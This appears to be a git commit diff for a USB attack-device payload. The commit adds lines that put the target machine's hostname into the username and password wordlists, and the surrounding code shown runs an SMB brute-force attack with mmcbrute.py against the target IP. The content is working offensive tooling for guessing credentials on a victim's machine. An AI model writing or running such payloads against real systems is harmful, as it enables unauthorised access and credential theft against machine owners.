A little nasty trick!
Sometimes the host name is the same as the username so we will add it to the username and the password wordlists automatically to be used during the brute force attack.pull/383/head
parent
b3537e7a65
commit
92f1be3a52
|
@ -17,6 +17,10 @@ mount /dev/nandf /root/udisk/
|
|||
GET TARGET_IP
|
||||
GET TARGET_HOSTNAME
|
||||
|
||||
# A little trick: Sometimes the host name is the same as the username so we will add it to the username and the password wordlists automatically to be used during the brute force attack.
|
||||
echo $TARGET_HOSTNAME >> $user_bruteforce_list
|
||||
echo $TARGET_HOSTNAME >> $pass_bruteforce_list
|
||||
|
||||
# Perform SMB bruteforce attack
|
||||
LED STAGE1
|
||||
python $ORIGINAL_SWITCH/mmcbrute/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file
|
||||
|
|
Loading…
Reference in New Issue